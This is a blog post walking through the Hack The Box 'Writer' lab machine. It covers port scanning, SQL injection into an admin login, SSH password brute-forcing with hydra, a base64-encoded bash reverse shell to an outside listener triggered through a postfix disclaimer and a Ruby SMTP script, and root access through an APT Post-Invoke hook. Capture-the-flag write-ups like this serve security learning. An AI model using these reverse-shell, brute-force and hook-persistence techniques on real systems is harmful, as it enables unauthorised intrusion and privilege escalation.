DEV Community: Berkcan Uçan The latest articles on DEV Community by Berkcan Uçan (@alcadramin). https://dev.to/alcadramin https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F772613%2Fa869a35c-5d10-4ae6-b953-930de5b82580.png DEV Community: Berkcan Uçan https://dev.to/alcadramin en Let's Hack this Box - Writer (Writeup) Berkcan Uçan Sat, 11 Dec 2021 13:23:00 +0000 https://dev.to/alcadramin/lets-hack-this-box-writer-writeup-5a30 https://dev.to/alcadramin/lets-hack-this-box-writer-writeup-5a30 <p>Hello guys! This is my first post here. I am planning to post <strong>Hack the Box</strong> writeups, Web Dev logs and also my Kaggle journeys. Today I am going to work on <a href="https://app.hackthebox.com/machines/361">Writer</a>.</p> <blockquote> <p>Before start, please try to pawn this machine by <strong>yourself</strong> first.</p> </blockquote> <p>"Writer" is rated as Medium difficulty (Linux) machine, we'll see how it goes! I usually start with nmap to see what's going on.</p> <ul> <li> <strong>nmap</strong> is a must have tool to find open ports, services, which OS host uses etc. </li> </ul> <h2> nmap scan </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alcadramin@archlinux ➜ ~ <span class="nb">sudo </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-sS</span> <span class="nt">-A</span> 10.10.11.101 </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-12-03 07:00 +03 Stats: 0:00:24 elapsed<span class="p">;</span> 0 hosts completed <span class="o">(</span>1 up<span class="o">)</span>, 1 undergoing Traceroute Traceroute Timing: About 32.26% <span class="k">done</span><span class="p">;</span> ETC: 07:00 <span class="o">(</span>0:00:00 remaining<span class="o">)</span> Nmap scan report <span class="k">for </span>10.10.11.101 Host is up <span class="o">(</span>0.075s latency<span class="o">)</span><span class="nb">.</span> Not shown: 996 closed tcp ports <span class="o">(</span>reset<span class="o">)</span> PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> | ssh-hostkey: | 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d <span class="o">(</span>RSA<span class="o">)</span> | 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 <span class="o">(</span>ECDSA<span class="o">)</span> |_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d <span class="o">(</span>ED25519<span class="o">)</span> 80/tcp open http Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span> |_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span> |_http-title: Story Bank | Writer.HTB 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 No exact OS matches <span class="k">for </span>host <span class="o">(</span>If you know what OS is running on it, see https://nmap.org/submit/ <span class="o">)</span><span class="nb">.</span> TCP/IP fingerprint: OS:SCAN<span class="o">(</span><span class="nv">V</span><span class="o">=</span>7.92%E<span class="o">=</span>4%D<span class="o">=</span>12/3%OT<span class="o">=</span>22%CT<span class="o">=</span>1%CU<span class="o">=</span>42753%PV<span class="o">=</span>Y%DS<span class="o">=</span>2%DC<span class="o">=</span>T%G<span class="o">=</span>Y%TM<span class="o">=</span>61A9966 OS:6%P<span class="o">=</span>x86_64-pc-linux-gnu<span class="o">)</span>SEQ<span class="o">(</span><span class="nv">SP</span><span class="o">=</span>105%GCD<span class="o">=</span>1%ISR<span class="o">=</span>10A%TI<span class="o">=</span>Z%CI<span class="o">=</span>Z%II<span class="o">=</span>I%TS<span class="o">=</span>A<span class="o">)</span>OPS OS:<span class="o">(</span><span class="nv">O1</span><span class="o">=</span>M54DST11NW7%O2<span class="o">=</span>M54DST11NW7%O3<span class="o">=</span>M54DNNT11NW7%O4<span class="o">=</span>M54DST11NW7%O5<span class="o">=</span>M54DST1 OS:1NW7%O6<span class="o">=</span>M54DST11<span class="o">)</span>WIN<span class="o">(</span><span class="nv">W1</span><span class="o">=</span>FE88%W2<span class="o">=</span>FE88%W3<span class="o">=</span>FE88%W4<span class="o">=</span>FE88%W5<span class="o">=</span>FE88%W6<span class="o">=</span>FE88<span class="o">)</span>ECN OS:<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>FAF0%O<span class="o">=</span>M54DNNSNW7%CC<span class="o">=</span>Y%Q<span class="o">=)</span>T1<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%S<span class="o">=</span>O%A<span class="o">=</span>S+%F<span class="o">=</span>A OS:S%RD<span class="o">=</span>0%Q<span class="o">=)</span>T2<span class="o">(</span><span class="nv">R</span><span class="o">=</span>N<span class="o">)</span>T3<span class="o">(</span><span class="nv">R</span><span class="o">=</span>N<span class="o">)</span>T4<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>A%A<span class="o">=</span>Z%F<span class="o">=</span>R%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T5<span class="o">(</span>R OS:<span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>Z%A<span class="o">=</span>S+%F<span class="o">=</span>AR%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T6<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>A%A<span class="o">=</span>Z%F OS:<span class="o">=</span>R%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T7<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>Z%A<span class="o">=</span>S+%F<span class="o">=</span>AR%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>U1<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>N% OS:T<span class="o">=</span>40%IPL<span class="o">=</span>164%UN<span class="o">=</span>0%RIPL<span class="o">=</span>G%RID<span class="o">=</span>G%RIPCK<span class="o">=</span>G%RUCK<span class="o">=</span>G%RUD<span class="o">=</span>G<span class="o">)</span>IE<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DFI<span class="o">=</span>N%T<span class="o">=</span>40%CD OS:<span class="o">=</span>S<span class="o">)</span> Network Distance: 2 hops Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 15m52s |_nbstat: NetBIOS name: WRITER, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; <span class="o">(</span>unknown<span class="o">)</span> | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb2-time: | <span class="nb">date</span>: 2021-12-03T04:16:28 |_ start_date: N/A TRACEROUTE <span class="o">(</span>using port 3306/tcp<span class="o">)</span> HOP RTT ADDRESS 1 73.43 ms 10.10.14.1 2 73.95 ms 10.10.11.101 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span> Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>27.84 seconds </code></pre> </div> <p>We can clearly see that we've a HTTP server let's check what's inside 👀.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--dJzoJpqq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/1382ee9f294d" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--dJzoJpqq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/1382ee9f294d" alt="Writer Website" width="880" height="429"></a></p> <h2> Finding URI's with gobuster </h2> <p>Nothing interesting, let's find URI's (directories) with <code>gobuster</code>, which usually leads us to some goodies.</p> <p><a href="https://github.com/OJ/gobuster">Gobuster</a> is a tool used to brute-force:</p> <ul> <li>URIs (directories and files) in web sites.</li> <li>DNS subdomains (with wildcard support).</li> <li>Virtual Host names on target web servers.</li> <li>Open Amazon S3 buckets </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alcadramin@archlinux ➜ wordlists gobuster <span class="nb">dir</span> <span class="nt">-u</span> 10.10.11.101 <span class="nt">-w</span> directory-list-2.3-small.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">===============================================================</span> Gobuster v3.1.0 by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> <span class="o">===============================================================</span> <span class="o">[</span>+] Url: http://10.10.11.101 <span class="o">[</span>+] Method: GET <span class="o">[</span>+] Threads: 10 <span class="o">[</span>+] Wordlist: directory-list-2.3-small.txt <span class="o">[</span>+] Negative Status codes: 404 <span class="o">[</span>+] User Agent: gobuster/3.1.0 <span class="o">[</span>+] Timeout: 10s <span class="o">===============================================================</span> 2021/12/03 07:22:14 Starting gobuster <span class="k">in </span>directory enumeration mode <span class="o">===============================================================</span> /contact <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 4905] /about <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 3522] /static <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 313] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.10.11.101/static/] /logout <span class="o">(</span>Status: 302<span class="o">)</span> <span class="o">[</span>Size: 208] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.10.11.101/] /dashboard <span class="o">(</span>Status: 302<span class="o">)</span> <span class="o">[</span>Size: 208] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.10.11.101/] /administrative <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 1443] <span class="o">===============================================================</span> 2021/12/03 07:33:27 Finished <span class="o">===============================================================</span> </code></pre> </div> <p><code>administrative</code> seem's interesting.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--t8QInhcl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/612780d908ce" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--t8QInhcl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/612780d908ce" alt="Administrative Page" width="880" height="426"></a></p> <p>We've a good old login form, we can check if it's vulnerable to SQL injections, request capturing etc. Let's take a look with <strong>Burp Suite</strong>!</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s---21QgMWf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/555050a39b7e" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s---21QgMWf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/555050a39b7e" alt="Burp POST" width="880" height="480"></a></p> <h2> SQL Injection </h2> <p>Hmm, I've tried weak passwords etc. nothing works, let's try with UNION which is a common SQL vulnerability.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--6tRZnvwo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/f96eb1773264" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--6tRZnvwo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/f96eb1773264" alt="Burp SQL Query" width="880" height="480"></a></p> <p>Yay! 🎉 It is vulnerable to SQL injections. I'm just gonna try this request with <code>sqlmap</code> as well. PS: Just copy the request from Burp and save it to a file then pass it to <code>sqlmap</code> with <code>-r</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alcadramin@archlinux ➜ Writer sqlmap <span class="nt">-r</span> request </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--TeBTFzjw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/61f2a530a647" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--TeBTFzjw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/61f2a530a647" alt="sqlmap" width="880" height="289"></a></p> <p>Yep it's very clear now, let's continue with Burp.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NVVXHgvf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/d295fabeabdf" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NVVXHgvf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/d295fabeabdf" alt="Burp Injection Success" width="880" height="479"></a></p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--uJTNKD3R--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/b9880a17c8ed" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--uJTNKD3R--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/b9880a17c8ed" alt="Burp Injection Success Page Render" width="880" height="960"></a></p> <p>We're in. I am going to login with <code>admin' ;**^</code> query. I've checked dashboard and found we can try to upload image and try to get shell however since we can SQL inject, I'm gonna find users and try to brute-force ssh.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--3F5KRVXD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/7215a876b6c9" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--3F5KRVXD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/7215a876b6c9" alt="Dashboard" width="880" height="687"></a></p> <p>So I've just quickly writed down an injection (you can see the original one in sqlmap screenshot) to get <code>/etc/passwd</code>.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--a1Y7i7TD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/82ff1bd063a7" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--a1Y7i7TD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/82ff1bd063a7" alt="Burp Injection passwd" width="880" height="479"></a></p> <p>We can see our users!</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qvpF85n2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/c16e65cf81a7" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qvpF85n2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/c16e65cf81a7" alt="Burp Injection passwd 2" width="880" height="959"></a></p> <h2> SSH Brute-force </h2> <p>We've <code>kyle</code> and <code>john</code>, let's try to brute-force <code>kayle</code> with <code>hydra</code>. (I've tried <code>john</code> as well and waited long time couldn't crack it, so gonna continue with <code>kyle</code>)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash john:x:1001:1001:,,,:/home/john:/bin/bash </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>salcadramin@archlinux ➜ Writer sudo hydra -l kyle -P ~/pwn/wordlists/rockyou.txt ssh://10.10.11.101 -VV -f -t 60 </code></pre> </div> <p>Not so long after, we've found their password!</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--LAqpKUFV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/286b8f8d2eb3" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--LAqpKUFV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/286b8f8d2eb3" alt="hydra" width="880" height="80"></a></p> <p>And let's connect with ssh! (Someone was already here)</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Kj6Lx-lu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/15461553472e" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Kj6Lx-lu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/15461553472e" alt="shell 1" width="880" height="219"></a></p> <p>Let's check the ports see if we can find something vulnerable.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--CcUrf95f--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/c6c486f45514" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--CcUrf95f--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/c6c486f45514" alt="netstat" width="880" height="310"></a></p> <p>We can get our user hash now, unfortunately <code>kyle</code> doesn't have sudo access so we'll try to reverse shell to <code>john</code> with SMTP. (No suprise 👀)</p> <p>After some research I've come accross with this repository, which basically allows you to remap ports to desired one : <a href="https://github.com/cw1997/NATBypass">https://github.com/cw1997/NATBypass</a></p> <p>I'm going to compile it and upload to <code>kyle</code> with sftp.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alcadramin@archlinux ➜ ~ sftp kyle@10.10.11.101 kyle@10.10.11.101<span class="s1">'s password: Connected to 10.10.11.101. sftp&gt; put /home/alcadramin/pwn/natbypass </span></code></pre> </div> <p>Generate the reverse shell payload with base64.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alcadramin@archlinux ➜ ~ <span class="nb">echo</span> <span class="nt">-n</span> <span class="s1">'/bin/bash -c "/bin/bash -i &gt;&amp; /dev/tcp/10.10.14.174/7678 0&gt;&amp;1"'</span> | <span class="nb">base64 </span><span class="nv">L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0LzMxMzYgMD4mMSI</span><span class="o">=</span> </code></pre> </div> <p>Let's run the tool and bind it to a random IP. </p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--vhFDPjLT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/68b567836127" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--vhFDPjLT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/68b567836127" alt="Natbypass" width="880" height="278"></a></p> <p>Now we'll add our payload to <code>/etc/postfix/disclaimer</code> and listen through <code>ncat</code>.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--sUpLQ63y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/82b304323c01" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--sUpLQ63y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/82b304323c01" alt="Revshell" width="880" height="286"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo </span><span class="nv">L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0Lzc2NzggMD4mMSI</span><span class="o">=</span> | <span class="nb">base64</span> <span class="nt">-d</span> | bash </code></pre> </div> <p>Now that they're done, I'm gonna write a script with Ruby to send an email and execute the payload.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight ruby"><code><span class="c1">#!/usr/bin/env ruby</span> <span class="nb">require</span> <span class="s1">'net/smtp'</span> <span class="nb">require</span> <span class="s1">'openssl'</span> <span class="no">OpenSSL</span><span class="o">::</span><span class="no">SSL</span><span class="o">::</span><span class="no">VERIFY_PEER</span> <span class="o">=</span> <span class="no">OpenSSL</span><span class="o">::</span><span class="no">SSL</span><span class="o">::</span><span class="no">VERIFY_NONE</span> <span class="n">message</span> <span class="o">=</span> <span class="o">&lt;&lt;</span><span class="no">MESSAGE_END</span><span class="sh"> Hey John, give me your shell pls. </span><span class="no">MESSAGE_END</span> <span class="no">Net</span><span class="o">::</span><span class="no">SMTP</span><span class="p">.</span><span class="nf">start</span><span class="p">(</span><span class="s1">'10.10.11.101'</span><span class="p">,</span> <span class="mi">3137</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">smtp</span><span class="o">|</span> <span class="n">smtp</span><span class="p">.</span><span class="nf">send_message</span> <span class="n">message</span><span class="p">,</span> <span class="s1">'kyle@10.10.11.101'</span><span class="p">,</span> <span class="s1">'john@10.10.11.101'</span> <span class="k">end</span> </code></pre> </div> <p>Hey we're in John now. I've quickly realise there is a private ssh key, so I can use that to connect with ssh!</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--vZUC0LgP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/e60e829e9abe" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--vZUC0LgP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/e60e829e9abe" alt="nc capture" width="880" height="147"></a></p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--0hFAvpHB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/fc3013d2b11e" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--0hFAvpHB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/fc3013d2b11e" alt="ssh key" width="880" height="423"></a></p> <p>We can check John's groups.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>john@writer:~<span class="nv">$ </span><span class="nb">id </span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>john<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>john<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>john<span class="o">)</span>,1003<span class="o">(</span>management<span class="o">)</span> </code></pre> </div> <p>I am just gonna upload <code>pspy64</code> to John via sftp and check running processes.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alcadramin@archlinux ➜ Writer sftp <span class="nt">-i</span> john_key john@10.10.11.101 Connected to 10.10.11.101. sftp&gt; put /home/alcadramin/pwn/pspy64 </code></pre> </div> <h2> Privilege Escalation </h2> <p>So I ran <code>pspy64</code> and realise this naughty boy is running APT via cron and we also have access to APT hooks so we can create a payload in <code>/etc/apt/apt.conf.d</code>. (<a href="https://wiki.debian.org/AptConfiguration">https://wiki.debian.org/AptConfiguration</a>)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>2021/12/03 18:08:02 CMD: <span class="nv">UID</span><span class="o">=</span>0 <span class="nv">PID</span><span class="o">=</span>27301 | /usr/bin/apt-get update 2021/12/03 18:09:01 CMD: <span class="nv">UID</span><span class="o">=</span>0 <span class="nv">PID</span><span class="o">=</span>27326 | /usr/sbin/CRON <span class="nt">-f</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'APT::Update::Post-Invoke {"echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTc0LzEyMTIgMD4mMSI= | base64 -d | bash"};'</span><span class="o">&gt;</span> 01payload </code></pre> </div> <p>And we got root access!</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--IRTI6uav--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/297654db064f" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--IRTI6uav--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/297654db064f" alt="root" width="657" height="189"></a></p> <p>Finally I'm submitting my hashes!</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NN_YVjwk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/ce2ec64917eb" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NN_YVjwk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/ce2ec64917eb" alt="pawned" width="696" height="640"></a></p> <ul> <li>Thank you for reading this article, hope you've had fun and learned something! See you next time!</li> </ul> hackthebox hacking